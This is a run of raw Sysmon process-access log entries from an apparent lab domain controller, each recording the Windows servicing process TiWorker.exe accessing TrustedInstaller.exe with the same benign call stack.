12:02:25.293{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.293{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.278{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.262{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.247{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.247{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.247{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.231{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.231{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.216{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.216{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.200{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.200{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.184{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.169{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 